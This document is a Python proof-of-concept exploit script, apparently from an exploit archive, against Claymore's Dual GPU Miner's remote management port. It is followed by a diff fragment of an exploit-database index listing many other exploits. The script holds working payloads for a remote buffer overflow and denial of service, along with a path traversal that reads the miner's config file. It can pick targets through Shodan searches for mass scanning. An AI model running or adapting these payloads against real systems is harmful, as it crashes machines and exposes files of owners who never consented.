aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
.... <crash>
PoC:
#> poc.py 127.0.0.1:3333
[poc.py - <module>() ][ INFO] --start--
[poc.py - <module>() ][ INFO] # Claymore's Dual ETH + DCR/SC/LBC/PASC GPU Miner - Remote Buffer Overwrite
[poc.py - <module>() ][ INFO] # github.com/tintinweb
[poc.py - iter_targets() ][ WARNING] shodan apikey missing! shodan support disabled.
[poc.py - <module>() ][ INFO] [i] Target: 127.0.0.1:3333
[poc.py - <module>() ][ INFO] [+] connected.
[poc.py - <module>() ][ INFO] [+] peer disappeared. vulnerable!
[poc.py - <module>() ][ WARNING] error(10054, 'Eine vorhandene Verbindung wurde vom Remotehost geschlossen')
[poc.py - <module>() ][ INFO] --done--
'''
import logging
import json
import time
import argparse
import socket
try:
import socks
except ImportError:
print "!! cannot import socks. no socks support!"
socks = None
try:
import shodan
except ImportError:
print "!! cannot import shodan. no shodan support!"
shodan = None
LOGGER = logging.getLogger(__name__)
class MinerRpc(object):
"""
Generic MinerRpc class with socks support
"""
def __init__(self):
self.sock = None
def connect(self, host, port, proxy=None, timeout=15):
if socks:
self.sock = socks.socksocket()
else:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(timeout)
if proxy:
if not socks:
raise Exception("socks support disabled due to unmet dependency. please install pysocks")
self.sock.set_proxy(*proxy)
return self.sock.connect((host, port))
def sendRcv(self, msg, chunksize=4096):
self.sock.sendall(msg)
chunks = []
chunk = None
#time.sleep(2)
while chunk is None or len(chunk)==chunksize:
chunk = self.sock.recv(chunksize)
chunks.append(chunk)
return "".join(chunks)
def sendRcvTimed(self, msg, chunksize=1):
self.sock.sendall(msg)
start = time.time()
resp = self.sock.recv(chunksize)
diff = time.time()-start
return diff, resp
class Utils:
"""
Utility namespace
"""
@staticmethod
def iter_targets(targets, shodan_apikey):
shodan_api = None
if not shodan:
LOGGER.warning(
"[i] starting without shodan support. please pip install shodan to use shodan search strings.")
else:
if not shodan_apikey:
LOGGER.warning("shodan apikey missing! shodan support disabled.")
else:
shodan_api = shodan.Shodan(shodan_apikey)
for target in targets:
if target.startswith("shodan://"):
target = target.replace("shodan://", "")
if shodan_api:
for t in shodan_api.search(target)['matches']:
yield t['ip_str'], t['port']
else:
host,port = target.strip().split(":")
yield host,int(port)
VECTORS = {
# Vector: extrafield
# Description: overly long value for field. overly long overall msg
# Result: crashes always, even though
# * password required
# * readonly mode (-<port>)
"extrafield" : {"id": 1,
"jsonrpc": "2.0",
"lol": "a" * 145000, ##<<--
"method": "miner_getstat1 ", },
# Vector: psw (basically same as extrafield)
# Description: overly long value for psw. overly long overall msg
# Result: crashes always, even though
# * password required
# * readonly mode (-<port>)
"psw" : { "id": 1,
"psw":"d"*145000, ##<<--
"jsonrpc": "2.0",
"method": "miner_getstat1", },
# Vector: method
# Description: overly long value for field. overly long overall msg
# Result: crashes always, even though
# * readonly mode (-<port>)
"method" : {"id": 1,
"jsonrpc": "2.0",
"method": "miner_getstat1 " + "a" * (16384 - 50 - 15 - 5), }, ##<<--
# Vector: traversal
# Description: path traversal
# Result: retrieves any file
"traversal": {"id":0,
"jsonrpc":"2.0",
"method":"miner_getfile",
"params":["../Claymore.s.Dual.Ethereum.Decred_Siacoin_Lbry_Pascal.AMD.NVIDIA.GPU.Miner.v10.0/config.txt"]}, ##<<-- adjust path
}
if __name__ == "__main__":
logging.basicConfig(format='[%(filename)s - %(funcName)20s() ][%(levelname)8s] %(message)s',
loglevel=logging.DEBUG)
LOGGER.setLevel(logging.DEBUG)
usage = """poc.py [options]
example: poc.py [options] <target> [<target>, ...]
options:
apikey ... optional shodan apikey
vector ... method ... overflow in method, requires password if set [readonly]
extrafield ... overflow in non-standard field [readonly, passwd mode]
psw ... overflow in password
traversal ... relative path traversal [authenticated]
target ... IP, FQDN or shodan://<search string>
#> poc.py 1.1.1.1
#> poc.py 1.2.3.4 "shodan://product:eth+result"
"""
parser = argparse.ArgumentParser(usage=usage)
parser.add_argument("-a", "--apikey",
dest="apikey", default=None,
help="shodan.io apikey, NotSet=disabled [default: None]")
parser.add_argument("-m", "--vector",
dest="vector", default="method",
help="vulnerablevectors [default: method]")
parser.add_argument("targets", nargs="+")
options = parser.parse_args()
LOGGER.info("--start--")
LOGGER.info("# Claymore's Dual ETH + DCR/SC/LBC/PASC GPU Miner - Remote Buffer Overwrite")
LOGGER.info("# github.com/tintinweb")
m = MinerRpc()
for ip, port in Utils.iter_targets(options.targets, options.apikey):
LOGGER.info("[i] Target: %s:%s"%(ip, port))
try:
m.connect(ip, port, timeout=20)
LOGGER.info("[+] connected.")
resp = m.sendRcv(json.dumps(VECTORS[options.vector])) # crash with readonly mode
LOGGER.debug("<-- %d %r"%(len(resp), resp))
if not len(resp):
LOGGER.info("[+] did not receive a response. probably vulnerable.")
except socket.error, e:
if e[0]==10054:
LOGGER.info("[+] peer disappeared. vulnerable!")
LOGGER.warning(repr(e))
LOGGER.info("--done--")


@ -5764,6 +5764,9 @@ id,file,description,date,author,type,platform,port
43194,exploits/linux/dos/43194.txt,"QEMU - NBD Server Long Export Name Stack Buffer Overflow",2017-11-29,"Eric Blake",dos,linux,
43199,exploits/linux/dos/43199.c,"Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page",2017-11-30,Bindecy,dos,linux,
43207,exploits/windows/dos/43207.txt,"Abyss Web Server < 2.11.6 - Heap Memory Corruption",2017-12-01,hyp3rlinx,dos,windows,
43229,exploits/windows/dos/43229.cs,"Microsoft Windows Defender - Controlled Folder Bypass Through UNC Path",2017-12-07,"Google Security Research",dos,windows,
43233,exploits/multiple/dos/43233.txt,"Wireshark 2.4.0 - 2.4.2 / 2.2.0 - 2.2.10 - CIP Safety Dissector Crash",2017-12-07,Wireshark,dos,multiple,
43234,exploits/linux/dos/43234.c,"Linux Kernel - DCCP Socket Use-After-Free",2017-12-07,"Mohamed Ghannam",dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -16007,6 +16010,9 @@ id,file,description,date,author,type,platform,port
43193,exploits/unix/remote/43193.rb,"pfSense - Authenticated Group Member Remote Command Execution (Metasploit)",2017-11-29,Metasploit,remote,unix,443
43198,exploits/windows/remote/43198.py,"HP iMC Plat 7.2 - Remote Code Execution (2)",2017-11-29,"Chris Lyne",remote,windows,
43209,exploits/windows/remote/43209.py,"VX Search 10.2.14 - 'command_name' Buffer Overflow",2017-12-05,W01fier00t,remote,windows,80
43226,exploits/cgi/remote/43226.py,"LaCie 5big Network 2.2.8 - Command Injection",2017-12-07,"Timo Sablowski",remote,cgi,
43230,exploits/unix/remote/43230.rb,"Polycom Shell HDX Series - Traceroute Command Execution (Metasploit)",2017-12-07,Metasploit,remote,unix,23
43231,exploits/windows/remote/43231.py,"Claymore Dual ETH + DCR/SC/LBC/PASC GPU Miner - Stack Buffer Overflow / Path Traversal",2017-12-07,tintinweb,remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -38258,3 +38264,6 @@ id,file,description,date,author,type,platform,port
43213,exploits/php/webapps/43213.txt,"FS Makemytrip Clone - 'id' SQL Injection",2017-12-06,Dan°,webapps,php,
43214,exploits/php/webapps/43214.py,"WinduCMS 3.1 - Local File Disclosure",2017-12-06,"Maciek Krupa",webapps,php,
43215,exploits/php/webapps/43215.txt,"FS Shaadi Clone - 'token' SQL Injection",2017-12-06,Dan°,webapps,php,80
43227,exploits/php/webapps/43227.txt,"FS IMDB Clone - 'id' SQL Injection",2017-12-07,Dan°,webapps,php,
43228,exploits/php/webapps/43228.txt,"FS Facebook Clone - 'token' SQL Injection",2017-12-07,Dan°,webapps,php,
43232,exploits/php/webapps/43232.txt,"OpenEMR 5.0.0 - OS Command Injection / Cross-Site Scripting",2017-12-07,"SEC Consult",webapps,php,80
